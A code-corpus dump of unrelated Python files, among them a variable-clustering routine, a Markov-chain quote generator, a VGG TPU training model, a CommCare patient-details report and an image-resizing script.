pd.DataFrame([])\n\t\n\tfor cluster in var_clus_cat:\n\t\t\n\t\tvar_lst = list(var_df[var_df['label'] == cluster]['woe'])\n\t\t\n\t\tprint('Processing Clustering for {0} variables for {1}...'.format(len(var_lst), cluster))\n\t\t\n\t\tdev_vc = VarClusHi(df_in[var_lst],maxeigval2 = 0.7, maxclus = None)\n\t\tdev_vc.varclus()\n\t\tdev_cluster_result = pd.merge(dev_vc.rsquare[['Cluster', 'Variable']], var_df[['woe', 'IV_dev']], left_on = 'Variable', right_on = 'woe', how = 'left')\n\t\t\n\t\tdev_cluster_result.sort_values(by = ['Cluster', 'IV_dev'], ascending = [True, False], inplace = True)\n\t\t\n\t\tdev_cluster_result = dev_cluster_result.groupby('Cluster', as_index = False).apply(top, n = 1,column='IV_dev')\t\n\t\tdev_cluster_result = dev_cluster_result[['woe']]\n\t\t\n\t\tclustering_sel_var_df = pd.concat([clustering_sel_var_df, dev_cluster_result])\n\t\n\tclustering_sel_var_df = clustering_sel_var_df.merge(var_df, on = 'woe', how = 'left')\n\t\n\t#Keep all the other categories that are not in the clustering category list\n\tfiltered_vars_other_df = var_df[~var_df['label'].isin(var_clus_cat)]\n\t\n\tclustering_sel_var_df = pd.concat([clustering_sel_var_df, filtered_vars_other_df])\n\t\n\tclustering_sel_var_df.index = range(len(clustering_sel_var_df))\n\t\n\treturn clustering_sel_var_df\n\t\n\n\n","sub_path":"LR/libraries/WoEPreselection.py","file_name":"WoEPreselection.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"640077486","text":"import sys\nimport re\nimport json\nimport requests\nimport textwrap\nfrom typing import List, Set, Dict, Callable\nfrom argparse import ArgumentParser\nfrom random import choice\n\n\ndef sanitize_quote(quote: str) -> str:\n # Strip HTML tags\n quote = re.sub(r'<.*?>', '', quote) # type: str\n\n # Replace HTML entities\n replace = {\n '’': '\\'',\n '‘': '\\'',\n '“': '\\\"',\n '”': '\\\"',\n '″': '\\\"',\n '–': '-',\n '—': '-',\n '…': '...',\n '&': '&',\n\n # also remove these\n '\\n': '',\n '\\r': ''\n }\n for c in replace:\n quote = quote.replace(c, replace[c])\n\n # Strip leading and trailing whitespaces\n return quote.strip()\n\n\nclass SourceAPI:\n def fetch_quotes(self, n: int, batch_size: int) -> List[str]:\n raise NotImplementedError\n\n\nclass QuotesOnDesignAPI(SourceAPI):\n def __init__(self):\n self.__url = 'http://quotesondesign.com/wp-json/posts'\n\n def fetch_quotes(self, n: int, batch_size: int) -> List[str]:\n params = {\n 'filter[orderby]': 'rand',\n 'filter[posts_per_page]': batch_size\n }\n\n # Make this a set so there are no duplicates\n quotes = set() # type: Set[str]\n\n while len(quotes) < n:\n response = requests.get(url=self.__url, params=params)\n if response.ok:\n for q in json.loads(response.text):\n quotes.add(sanitize_quote(q['content']))\n if len(quotes) >= n:\n break\n\n print('Fetched %d/%d quotes.' % (len(quotes), n))\n else:\n print('Error fetching quotes.')\n exit(1)\n\n return list(quotes)\n\n\nclass DeszczowceAPI(SourceAPI):\n def __init__(self):\n self.__url = 'http://www.deszczowce.pl/skrypty/losowy_cytat.php'\n\n def fetch_quotes(self, n: int, batch_size: int) -> List[str]:\n print(\"NOTE: Deszczowce API doesn't support fetching in batches. Consider fetching small amounts of quotes.\")\n\n quotes = set() # type: Set[str]\n for i in range(n):\n response = requests.get(url=self.__url)\n if response.ok:\n content = response.content.decode('iso-8859-2')\n match = re.search(r'(.*?)\"', content)\n if match:\n quote = match.groups()[0][1:] # type: str\n quotes.add(quote)\n print('Fetched %d/%d quotes.' % (i + 1, n))\n else:\n print('Error fetching quotes.')\n exit(1)\n\n return list(quotes)\n\n\nclass Generator:\n def __init__(self, dataset: List[str], ngram_len: int):\n self.__dataset = dataset\n self.__ngram_len = ngram_len\n self.__ngrams = {} # type: Dict[str, Dict[str, int]]\n\n for s in dataset:\n for start in range(0, len(s) - ngram_len + 1):\n\n # Get a slice of the string as the ngram\n gram = s[start:start + ngram_len]\n if gram not in self.__ngrams:\n self.__ngrams[gram] = {}\n\n # Find what character comes after the ngram\n next_char = ''\n if start + ngram_len < len(s):\n next_char = s[start + ngram_len]\n\n # Increment the probability of that character appearing after the ngram\n if next_char in self.__ngrams[gram]:\n self.__ngrams[gram][next_char] += 1\n else:\n self.__ngrams[gram][next_char] = 1\n\n def generate(self) -> str:\n\n # Choose the start of a random quote in the dataset as the first ngram\n current = choice(self.__dataset)[0:self.__ngram_len] # type: str\n result = current\n\n running = True\n while running:\n pool = [] # type: List[str]\n for char, times in self.__ngrams[current].items():\n pool += [char] * times\n\n next_char = choice(pool)\n if next_char == '':\n running = False\n else:\n result += next_char\n current = result[len(result) - self.__ngram_len:]\n\n return result\n\n\nif __name__ == '__main__':\n\n # Dataset source APIs\n sources = {\n 'quotesondesign': QuotesOnDesignAPI(),\n 'deszczowce': DeszczowceAPI()\n }\n\n # Parse options\n parser = ArgumentParser(description='Generates quotes.')\n\n parser.add_argument('--dataset-source', '-s', dest='dataset_source', default='quotesondesign', choices=sources.keys(),\n help='the API to use to fetch the source dataset')\n\n parser.add_argument('--dataset-size', '-n', dest='dataset_size', default=200, type=int,\n help='how many quotes to fetch from the API to use as the source dataset')\n\n parser.add_argument('--dataset-batch-size', '-b', dest='batch_size', default=40, type=int,\n help='how many quotes to fetch in a single request')\n\n parser.add_argument('--ngram-length', '-g', dest='ngram_length', default=5, type=int,\n help='length of ngrams to use for the Markov chain')\n\n args = parser.parse_args()\n\n # Generate & print\n print('Fetching dataset...')\n source = sources[args.dataset_source]\n quotes = source.fetch_quotes(args.dataset_size, args.batch_size)\n quote = Generator(quotes, args.ngram_length).generate()\n\n wrapped = '\\n\\t '.join(textwrap.wrap(quote, 80))\n print('\\n\\t\"%s\"\\n' % wrapped)\n","sub_path":"quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":5687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"304884306","text":"#!/usr/bin/env python\n\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n\nfrom vaspwfc import vaspwfc\nfrom paw import nonlq, nonlr\nfrom spinorb import read_cproj_NormalCar\n\nimport numpy as np\nfrom ase.io import read, write\n\ncprojs = read_cproj_NormalCar()\ncprojs.shape = ((3, 16, 34))\niband = 10\nikpt = 1\ncc = cprojs[ikpt-1, iband-1]\n\nposcar = read('POSCAR')\nwfc = vaspwfc()\n\ncptwf = wfc.readBandCoeff(iband=iband, ikpt=ikpt)\np1 = nonlq(poscar, wfc._encut, k=wfc._kvecs[ikpt-1])\n\nILM = [(i, l, m) for i, it in zip([0, 1, 2], [0, 1, 1])\n for l in p1.pawpp[it].proj_l\n for m in range(-l, l+1)]\n\n\nimport time\nt0 = time.time()\nbeta = p1.proj(cptwf)\nt1 = time.time()\nprint(t1 - t0)\n\nfigure = plt.figure(figsize=(4,4))\nax = plt.subplot()\nax.set_aspect('equal')\n\nax.plot([0, np.abs(cc).max()], [0, np.abs(cc).max()], ':', lw=1.5, alpha=0.6)\nax.plot(np.abs(beta), np.abs(cc), 'bd', alpha=0.6, ms=5)\n# ax.plot(beta.imag, cc.imag, 'bd', alpha=0.6, ms=5)\n\nfor ilm, x, y in zip(ILM, np.abs(beta), np.abs(cc)):\n ax.text(x, y, \"({},{},{})\".format(*ilm),\n ha=\"center\",\n va=\"center\",\n fontsize='small',\n # family='monospace',\n # fontweight='bold'\n transform=ax.transData,\n # bbox=dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n )\n\nax.set_title(\"Reciprocal Space Projectors\")\nax.set_xlabel('My script', labelpad=5)\nax.set_ylabel('VASP NormalCar', labelpad=5)\n\nplt.tight_layout()\nplt.savefig('kaka.png', dip=360)\nplt.show()\n","sub_path":"examples/projectors/lreal_false/kaka.py","file_name":"kaka.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"481792734","text":"from math import sqrt\nimport numpy as np\nfrom fathom.imagenet.imagenet_cp import *\nfrom fathom.nn import *\nimport tensorflow as tf\nfrom tensorflow.contrib.tpu.python.tpu import tpu_config\nfrom tensorflow.contrib.tpu.python.tpu import tpu_estimator\nfrom tensorflow.contrib.tpu.python.tpu import tpu_optimizer\nimport time\n\ndef model_fn(features, labels, mode, params):\n del params # Unused.\n\n if mode != tf.estimator.ModeKeys.TRAIN:\n raise RuntimeError(\"mode {} is not supported yet\".format(mode))\n\n # Convolution and pooling layers.\n input_layer = features\n # block 1 -- outputs 112x112x64\n conv1_1 = tf.layers.conv2d(\n inputs=input_layer,\n filters=64,\n kernel_size=3,\n activation=tf.nn.relu,\n strides=1)\n conv1_2 = tf.layers.conv2d(\n inputs=conv1_1,\n filters=64,\n kernel_size=3,\n activation=tf.nn.relu,\n strides=1)\n pool1 = tf.layers.max_pooling2d(\n inputs=conv1_2,\n pool_size=2,\n strides=2)\n\n conv2_1 = tf.layers.conv2d( \n inputs=pool1,\n filters=128,\n activation=tf.nn.relu,\n kernel_size=3)\n conv2_2 = tf.layers.conv2d(\n inputs=conv2_1,\n filters=128,\n activation=tf.nn.relu,\n kernel_size=3)\n pool2 = tf.layers.max_pooling2d(\n inputs=conv2_2,\n pool_size=2,\n strides=2)\n\n conv3_1 = tf.layers.conv2d(\n inputs=pool2,\n filters=256,\n activation=tf.nn.relu,\n kernel_size=3)\n conv3_2 = tf.layers.conv2d(\n inputs=conv3_1, \n filters=256,\n activation=tf.nn.relu,\n kernel_size=3)\n pool3 = tf.layers.max_pooling2d(\n inputs=conv3_2,\n pool_size=2,\n strides=2)\n\n conv4_1 = tf.layers.conv2d(\n inputs=pool3,\n filters=512,\n activation=tf.nn.relu,\n kernel_size=3)\n conv4_2 = tf.layers.conv2d(\n inputs=conv4_1,\n filters=512,\n activation=tf.nn.relu,\n kernel_size=3)\n pool4 = tf.layers.max_pooling2d(\n inputs=conv4_2,\n pool_size=2,\n strides=2)\n\n conv5_1 = tf.layers.conv2d(\n inputs=pool4,\n filters=512,\n activation=tf.nn.relu,\n kernel_size=3)\n conv5_2 = tf.layers.conv2d(\n inputs=conv5_1,\n filters=512,\n activation=tf.nn.relu,\n kernel_size=3)\n pool5 = tf.layers.max_pooling2d(\n inputs=conv5_2,\n pool_size=2,\n strides=2)\n\n\n shp = pool5.get_shape().as_list() # pool2 if shrunk\n flattened_shape = shp[1] * shp[2] * shp[3]\n resh1 = tf.reshape(pool5, [shp[0], flattened_shape], name=\"resh1\")\n\n # Fully connected layers with dropout.\n fc6 = tf.layers.dense(\n inputs=resh1,\n units=4096,\n activation=tf.nn.relu)\n drp6 = tf.layers.dropout(\n inputs=fc6,\n rate=(1-FLAGS.dropout_keep_prob))\n fc7 = tf.layers.dense(\n inputs=drp6,\n units=4096,\n activation=tf.nn.relu)\n drp7 = tf.layers.dropout(\n inputs=fc7,\n rate=(1-FLAGS.dropout_keep_prob))\n fc8 = tf.layers.dense(\n inputs=drp7,\n units=FLAGS.num_classes)\n\n\n # Calculating the loss.\n loss = tf.losses.softmax_cross_entropy(\n onehot_labels=labels, logits=fc8)\n\n # Configuring the optimization algorithm.\n learning_rate = tf.train.exponential_decay(\n FLAGS.learning_rate, tf.train.get_global_step(), 25000, 0.97)\n if FLAGS.use_tpu:\n optimizer = tpu_optimizer.CrossShardOptimizer(\n tf.train.GradientDescentOptimizer(learning_rate=learning_rate))\n else:\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n\n train_op = optimizer.minimize(loss, global_step=tf.train.get_global_step())\n return tpu_estimator.TPUEstimatorSpec(mode=mode, loss=loss, train_op=train_op)\n\n \n\ndef main(unused_argv):\n assert len(unused_argv) == 1, (\n \"Unrecognized command line arguments: %s\" % unused_argv[1:])\n\n start = time.time()\n tf.logging.set_verbosity(tf.logging.INFO)\n\n run_config = tpu_config.RunConfig(\n master=FLAGS.master,\n model_dir=FLAGS.model_dir,\n save_checkpoints_secs=FLAGS.save_checkpoints_secs,\n session_config=tf.ConfigProto(\n allow_soft_placement=True, log_device_placement=True),\n #tpu_config=tpu_config.TPUConfig(5, FLAGS.num_shards, per_host_input_for_training = True),\n tpu_config=tpu_config.TPUConfig(FLAGS.iterations, FLAGS.num_shards),\n )\n estimator = tpu_estimator.TPUEstimator(\n model_fn=model_fn,\n use_tpu=FLAGS.use_tpu,\n train_batch_size=FLAGS.batch_size,\n config=run_config)\n estimator.train(input_fn=input_fn, max_steps=FLAGS.train_steps)\n total = time.time() - start\n print(\"Total time: \" + str(total))\n\nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"fathom_tpu/vgg/vgg.py","file_name":"vgg.py","file_ext":"py","file_size_in_byte":4579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"420119976","text":"from datetime import datetime, timedelta\nfrom couchdbkit.exceptions import ResourceNotFound\nfrom django.core.urlresolvers import reverse\nfrom django.http.response import Http404\nfrom django.utils import html\nfrom corehq.apps.api.es import ReportXFormES\nfrom corehq.apps.app_manager.models import ApplicationBase\nfrom corehq.apps.cloudcare.api import get_cloudcare_app, get_cloudcare_form_url\nfrom corehq.apps.reports.datatables import DataTablesHeader, DataTablesColumn\nfrom corehq.apps.reports.filters.search import SearchFilter\nfrom corehq.apps.reports.generic import ElasticProjectInspectionReport\nfrom corehq.apps.reports.standard import CustomProjectReport, ProjectReportParametersMixin\nfrom casexml.apps.case.models import CommCareCase\nfrom corehq.apps.users.models import CouchUser, CommCareUser\nfrom custom.succeed.reports import DrilldownReportMixin, VISIT_SCHEDULE, CM_APP_PD_MODULE, CM_APP_HUD_MODULE, CM_APP_CM_MODULE, CM_APP_CHW_MODULE, \\\n EMPTY_FIELD, OUTPUT_DATE_FORMAT, INPUT_DATE_FORMAT, PM2, PM_APP_PM_MODULE, CHW_APP_MA_MODULE, CHW_APP_PD_MODULE, SUBMISSION_SELECT_FIELDS, MEDICATION_DETAILS, INTERACTION_OUTPUT_DATE_FORMAT, CM_APP_MEDICATIONS_MODULE, PD2AM, PD2BPM, PD2CHM, PD2DIABM, PD2DEPM, PD2SCM, PD2OM, CM_APP_APPOINTMENTS_MODULE, AP2\nfrom custom.succeed.reports import PD1, PD2, PM3, PM4, HUD2, CM6, CHW3\nfrom custom.succeed.reports.patient_Info import PatientInfoDisplay\nfrom custom.succeed.utils import SUCCEED_CM_APPNAME, is_pm_or_pi, is_cm, is_pi, SUCCEED_PM_APPNAME, SUCCEED_CHW_APPNAME, is_chw, SUCCEED_DOMAIN\nfrom dimagi.utils.decorators.memoized import memoized\n\nclass PatientInfoReport(CustomProjectReport, DrilldownReportMixin, ElasticProjectInspectionReport, ProjectReportParametersMixin):\n slug = \"patient\"\n\n hide_filters = True\n filters = []\n ajax_pagination = True\n asynchronous = True\n emailable = False\n xform_es = ReportXFormES(SUCCEED_DOMAIN)\n\n default_sort = {\n \"received_on\": \"desc\"\n }\n\n def __init__(self, request, base_context=None, domain=None, **kwargs):\n self.view_mode = request.GET.get('view', 'info')\n super(PatientInfoReport, self).__init__(request, base_context, domain, **kwargs)\n\n @property\n def fields(self):\n if self.view_mode == 'submissions' and self.submission_user_access:\n return ['custom.succeed.fields.PatientFormNameFilter',\n 'corehq.apps.reports.standard.cases.filters.CaseSearchFilter']\n else:\n return []\n\n @property\n def base_template_filters(self):\n if self.view_mode == 'submissions' and self.submission_user_access:\n return 'succeed/report.html'\n else:\n return super(PatientInfoReport, self).base_template_filters\n\n @property\n def name(self):\n if self.view_mode == 'submissions':\n return \"Patient Submissions\"\n if self.view_mode == 'status':\n return 'Manage Patient Status'\n return \"Patient Info\"\n\n def get_case(self):\n if self.request.GET.get('patient_id', None) is None:\n return None\n return CommCareCase.get(self.request.GET['patient_id'])\n\n @property\n def submission_user_access(self):\n user = self.request.couch_user\n if user and (is_pi(user) or is_cm(user) or is_chw(user)):\n return True\n return False\n\n @property\n def patient_status_access(self):\n user = self.request.couch_user\n if user and is_pm_or_pi(user):\n return True\n return False\n\n @property\n def report_context(self):\n ret = {}\n\n try:\n case = self.get_case()\n has_error = False\n except ResourceNotFound:\n\n has_error = True\n case = None\n if case is None:\n self.report_template_path = \"patient_error.html\"\n if has_error:\n ret['error_message'] = \"Patient not found\"\n else:\n ret['error_message'] = \"No patient selected\"\n return ret\n\n\n def get_form_url(app_dict, app_build_id, module_idx, form, case_id=None):\n try:\n module = app_dict['modules'][module_idx]\n form_idx = [ix for (ix, f) in enumerate(module['forms']) if f['xmlns'] == form][0]\n except IndexError:\n form_idx = None\n\n return html.escape(get_cloudcare_form_url(domain=self.domain,\n app_build_id=app_build_id,\n module_id=module_idx,\n form_id=form_idx,\n case_id=case_id))\n\n\n try:\n cm_app_dict = get_cloudcare_app(case['domain'], SUCCEED_CM_APPNAME)\n latest_cm_build = ApplicationBase.get_latest_build(case['domain'], cm_app_dict['_id'])['_id']\n pm_app_dict = get_cloudcare_app(case['domain'], SUCCEED_PM_APPNAME)\n latest_pm_build = ApplicationBase.get_latest_build(case['domain'], pm_app_dict['_id'])['_id']\n chw_app_dict = get_cloudcare_app(case['domain'], SUCCEED_CHW_APPNAME)\n latest_chw_build = ApplicationBase.get_latest_build(case['domain'], chw_app_dict['_id'])['_id']\n except ResourceNotFound as ex:\n self.report_template_path = \"patient_error.html\"\n ret['error_message'] = ex.message\n return ret\n\n ret['patient'] = case\n ret['root_url'] = '?patient_id=%s' % case['_id']\n ret['view_mode'] = self.view_mode\n ret['patient_status_access'] = self.patient_status_access\n ret['submission_user_access'] = self.submission_user_access\n\n if self.view_mode == 'info':\n self.report_template_path = \"patient_info.html\"\n patient_info = PatientInfoDisplay(case)\n\n # check user role:\n user = self.request.couch_user\n if is_pm_or_pi(user):\n ret['edit_patient_info_url'] = get_form_url(pm_app_dict, latest_pm_build, PM_APP_PM_MODULE, PM2)\n elif is_cm(user):\n ret['edit_patient_info_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_PD_MODULE, PM2)\n elif is_chw(user):\n ret['edit_patient_info_url'] = get_form_url(chw_app_dict, latest_chw_build, CHW_APP_PD_MODULE, PM2)\n\n if is_pm_or_pi(user):\n ret['upcoming_appointments_url'] = get_form_url(pm_app_dict, latest_pm_build, PM_APP_PM_MODULE, PM2)\n elif is_cm(user):\n ret['upcoming_appointments_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_PD_MODULE, PM2)\n elif is_chw(user):\n ret['upcoming_appointments_url'] = get_form_url(chw_app_dict, latest_chw_build, CHW_APP_MA_MODULE, PM2)\n\n ret['general_information'] = patient_info.general_information\n ret['contact_information'] = patient_info.contact_information\n ret['most_recent_lab_exams'] = patient_info.most_recent_lab_exams\n ret['allergies'] = patient_info.allergies\n\n elif self.view_mode == 'submissions':\n if self.submission_user_access:\n tabular_context = super(PatientInfoReport, self).report_context\n tabular_context.update(ret)\n self.report_template_path = \"patient_submissions.html\"\n tabular_context['patient_id'] = self.request_params['patient_id']\n\n return tabular_context\n else:\n self.report_template_path = \"patient_error.html\"\n ret['error_message'] = \"Cannot access report(incorrect user role)\"\n return ret\n elif self.view_mode == 'interactions':\n self.report_template_path = \"patient_interactions.html\"\n ret['problem_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_PD_MODULE, PD1)\n ret['huddle_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_HUD_MODULE, HUD2)\n ret['cm_phone_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_CM_MODULE, CM6)\n ret['chw_phone_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_CHW_MODULE, CHW3)\n ret['cm_visits_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_APPOINTMENTS_MODULE, AP2)\n\n ret['anti_thrombotic_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_MEDICATIONS_MODULE, PD2AM)\n ret['blood_pressure_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_MEDICATIONS_MODULE, PD2BPM)\n ret['cholesterol_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_MEDICATIONS_MODULE, PD2CHM)\n ret['depression_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_MEDICATIONS_MODULE, PD2DIABM)\n ret['diabetes_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_MEDICATIONS_MODULE, PD2DEPM)\n ret['smoking_cessation_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_MEDICATIONS_MODULE, PD2SCM)\n ret['other_meds_url'] = get_form_url(cm_app_dict, latest_cm_build, CM_APP_MEDICATIONS_MODULE, PD2OM)\n\n ret['interaction_table'] = []\n for visit_key, visit in enumerate(VISIT_SCHEDULE):\n if case[\"randomization_date\"]:\n target_date = (case[\"randomization_date\"] + timedelta(days=visit['days'])).strftime(OUTPUT_DATE_FORMAT)\n else:\n target_date = EMPTY_FIELD\n interaction = {\n 'url': '',\n 'name': visit['visit_name'],\n 'target_date': target_date,\n 'received_date': EMPTY_FIELD,\n 'completed_by': EMPTY_FIELD,\n 'scheduled_date': EMPTY_FIELD\n }\n for key, action in enumerate(case['actions']):\n if visit['xmlns'] == action['xform_xmlns']:\n interaction['received_date'] = action['date'].strftime(INTERACTION_OUTPUT_DATE_FORMAT)\n try:\n user = CouchUser.get(action['user_id'])\n interaction['completed_by'] = user.raw_username\n except ResourceNotFound:\n interaction['completed_by'] = EMPTY_FIELD\n del case['actions'][key]\n break\n if visit['show_button']:\n interaction['url'] = get_form_url(cm_app_dict, latest_cm_build, visit['module_idx'], visit['xmlns'])\n if 'scheduled_source' in visit and case.get_case_property(visit['scheduled_source']):\n interaction['scheduled_date'] = (case.get_case_property(visit['scheduled_source'])).strftime(INTERACTION_OUTPUT_DATE_FORMAT)\n\n ret['interaction_table'].append(interaction)\n\n medication = []\n for med_prop in MEDICATION_DETAILS:\n medication.append(getattr(case, med_prop, EMPTY_FIELD))\n ret['medication_table'] = medication\n\n elif self.view_mode == 'plan':\n self.report_template_path = \"patient_plan.html\"\n elif self.view_mode == 'status':\n if self.patient_status_access:\n self.report_template_path = \"patient_status.html\"\n ret['disenroll_patient_url'] = get_form_url(pm_app_dict, latest_pm_build, PM_APP_PM_MODULE, PM3)\n ret['change_patient_data_url'] = get_form_url(pm_app_dict, latest_pm_build, PM_APP_PM_MODULE, PM4)\n else:\n self.report_template_path = \"patient_error.html\"\n ret['error_message'] = \"Only PMs can disenrollment participants\"\n return ret\n else:\n raise Http404\n return ret\n\n def submit_history_form_link(self, form_id, form_name):\n url = reverse('render_form_data', args=[self.domain, form_id])\n return html.mark_safe(\"%s\" % (url, html.escape(form_name)))\n\n @memoized\n def form_submitted_by(self, user_id):\n try:\n user = CommCareUser.get(user_id)\n return user.human_friendly_name\n except ResourceNotFound:\n return \"%s (User Not Found)\" % user_id\n\n def form_completion_time(self, date_string):\n if date_string != EMPTY_FIELD:\n date = datetime.strptime(date_string, \"%Y-%m-%dT%H:%M:%SZ\")\n return date.strftime(\"%m/%d/%Y %H:%M\")\n else:\n return EMPTY_FIELD\n\n @property\n def headers(self):\n return DataTablesHeader(\n DataTablesColumn(\"Form Name\", sortable=False, span=1),\n DataTablesColumn(\"Submitted By\", sortable=False, span=1),\n DataTablesColumn(\"Completed\", sortable=False, span=1)\n )\n\n @property\n def es_results(self):\n if not self.request.GET.has_key('patient_id'):\n return None\n\n full_query = {\n 'query': {\n \"filtered\": {\n \"filter\": {\n \"and\": [\n {\"term\": {\"domain.exact\": self.request.domain}},\n {\"term\": {\"doc_type\": \"xforminstance\"}},\n {\n \"nested\": {\n \"path\": \"form.case\",\n \"filter\": {\n \"or\": [\n {\n \"term\": {\n \"@case_id\": \"%s\" % self.request.GET[\n 'patient_id']\n }\n },\n {\n \"term\": {\n \"case_id\": \"%s\" % self.request.GET['patient_id']\n }\n }\n ]\n }\n }\n }\n ]\n },\n \"query\": {\"match_all\": {}}\n }\n },\n \"sort\": self.get_sorting_block(),\n \"size\": self.pagination.count,\n \"from\": self.pagination.start\n }\n\n form_name_group = self.request.GET.get('form_name_group', None)\n form_name_xmnls = self.request.GET.get('form_name_xmlns', None)\n search_string = SearchFilter.get_value(self.request, self.domain)\n\n if search_string:\n query_block = {\"queryString\": {\"query\": \"*\" + search_string + \"*\"}}\n full_query[\"query\"][\"filtered\"][\"query\"] = query_block\n\n if form_name_group and form_name_xmnls == '':\n xmlns_terms = []\n forms = filter(lambda obj: obj['val'] == form_name_group, SUBMISSION_SELECT_FIELDS)[0]\n for form in forms['next']:\n xmlns_terms.append(form['val'])\n\n full_query['query']['filtered']['filter']['and'].append({\"terms\": {\"xmlns.exact\": xmlns_terms}})\n\n if form_name_xmnls:\n full_query['query']['filtered']['filter']['and'].append({\"term\": {\"xmlns.exact\": form_name_xmnls}})\n\n res = self.xform_es.run_query(full_query)\n return res\n\n @property\n def rows(self):\n if self.request.GET.has_key('patient_id'):\n def _format_row(row_field_dict):\n return [self.submit_history_form_link(row_field_dict[\"_id\"],\n row_field_dict['_source'].get('es_readable_name', EMPTY_FIELD)),\n self.form_submitted_by(row_field_dict['_source']['form']['meta'].get('userID', EMPTY_FIELD)),\n self.form_completion_time(row_field_dict['_source']['form']['meta'].get('timeEnd', EMPTY_FIELD))\n ]\n\n res = self.es_results\n if res:\n if res.has_key('error'):\n pass\n else:\n for result in res['hits']['hits']:\n yield list(_format_row(result))\n","sub_path":"custom/succeed/reports/patient_details.py","file_name":"patient_details.py","file_ext":"py","file_size_in_byte":16437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"127850822","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[23]:\n\n\nfrom collections import Counter\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport sys\nimport time\nfrom TwitterAPI import TwitterAPI\nfrom nltk.tokenize import word_tokenize\nimport pandas as pd\nimport networkx as networkx\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n# In[24]:\n\n\ndef create_graph(quor = 0):\n data_list = []\n edges_l = []\n csv_list = ['USA-cluster.csv','UK-cluster.csv','India-cluster.csv']\n for csv in csv_list:\n data_list.append(csv);\n graph=nx.Graph()\n for file in data_list:\n frame=pd.read_csv(file,sep='\\t')\n for index,row in frame.iterrows():\n row_friend = row['friends'].split(',')\n l_friends=list(row['friends'].split(','))\n for ls in l_friends:\n edges_point = (row['Id'],ls)\n edges_l.append(edges_point)\n graph = graph_made(edges_l)\n return graph\n\n\n# In[25]:\n\n\ndef graph_made(edges_l):\n graph=nx.Graph()\n graph.add_edges_from(edges_l)\n nx.draw(graph)\n #nx.draw_networkx(graph)\n plt.figure(figsize=(100,100))\n plt.savefig(\"cluster.png\", format = \"PNG\")\n n=str(nx.nodes(graph))\n return graph\n\n\n# In[26]:\n\n\ndef girvan_newman_cluster(depth=0, min_nodes = 10, max_nodes =800, max_n = 0, index = 0):\n \n graph=create_graph()\n if graph.order() == 1:\n return [graph.nodes()]\n com_result=[]\n file_nam = \"cluster.txt\"\n file1=open(file_nam,\"w+\")\n\n component = get_components(graph)\n \n length_comp = len(component)\n if(length_comp>1):\n for ids,eg in enumerate(component):\n length_eg_node = len(eg.nodes())\n if max_n np.random.rand() :\n # portion_next = portion + np.sign(action) * 1e-4 * (30 + np.random.rand())\n #else :\n # portion_next = portion - np.sign(action) * 1e-4 * (50 + np.random.rand())\n # portion_next = portion + np.dot(featurize_state(self.state.reshape(-1,1)), self.w) * 1e-1\n cont_price = (price_next - benchmark_price) * -0.01\n # cont_portion = portion * 0.005\n portion_next = portion * decay_rate + cont_price #+ np.random.rand()*1e-1# + cont_portion\n \n if portion_next > portion_celing :\n portion_next = portion_celing + 1e-5 * np.random.rand()\n if portion_next < portion_floor :\n portion_next = portion_floor + 1e-5 * np.random.rand()\n \n if portion_next < 0.15 or price_next < 60:\n done = True\n else :\n done = False\n \n if done :\n reward = -100\n else :\n reward = price_next * w1 + portion * w2\n self.state = np.array([price_next, portion_next]).reshape(-1,)\n return self.state, reward, done, {}\n \n ","sub_path":"my_env/market.py","file_name":"market.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"149879273","text":"from PIL import Image\nimport sys\nimport os\n\nchair_folders = open(\"data/chair_folders.txt\", \"r\")\nfolder_count = 0\nRES = 64\n\nos.mkdir(str(RES) + \"_images/\")\nfor folder in chair_folders:\n folder_count += 1\n print(\"folder: \", folder_count)\n\n os.mkdir(str(RES) + \"_images/\" + folder.rstrip('\\n'))\n for i in range(20):\n img = Image.open(\"data/shapenet_release/renders/03001627/\" + folder.rstrip('\\n') + \"/render_\" + str(i) + \".png\")\n img = img.resize((RES, RES), Image.ANTIALIAS)\n img.save(str(RES) + \"_images/\" + folder.rstrip('\\n') + \"/render_\" + str(i) + \"_\" + str(RES) + \".png\")\n","sub_path":"resize_images.py","file_name":"resize_images.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"19547086","text":"#!/usr/bin/python\n\nimport string\nimport random\nimport re\n\nsccp = open('sccp.conf', 'w')\nsccpsimple = open('sccp.conf.simple', 'w')\nsccpdial = open('sccp.dialplan', 'w')\n\ndef randomMAC():\n mac = [ 0x00, 0x16, 0x3e,\n random.randint(0x00, 0x7f),\n random.randint(0x00, 0xff),\n random.randint(0x00, 0xff) ]\n return ''.join(map(lambda x: \"%02X\" % x, mac))\n\nline_instance = 1000\ncount = 